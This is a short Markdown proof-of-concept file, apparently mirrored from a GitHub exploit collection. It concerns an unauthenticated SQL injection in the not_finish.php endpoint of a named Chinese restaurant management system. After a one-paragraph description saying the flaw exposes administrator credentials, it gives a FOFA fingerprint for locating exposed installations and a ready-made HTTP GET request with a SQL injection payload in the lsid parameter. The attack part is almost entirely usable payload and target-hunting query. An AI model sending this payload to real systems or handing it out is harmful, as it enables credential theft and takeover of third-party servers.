mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 03:17:07 +00:00
18 lines
596 B
Markdown
18 lines
596 B
Markdown
## 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞
|
||
|
||
喰星云·数字化餐饮服务系统 not_finish.php 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。
|
||
|
||
## fofa
|
||
|
||
```yaml
|
||
body="tmp_md5_pwd"
|
||
```
|
||
|
||
## poc
|
||
|
||
```java
|
||
GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
|
||
Host: {{Hostname}}
|
||
```
|
||
|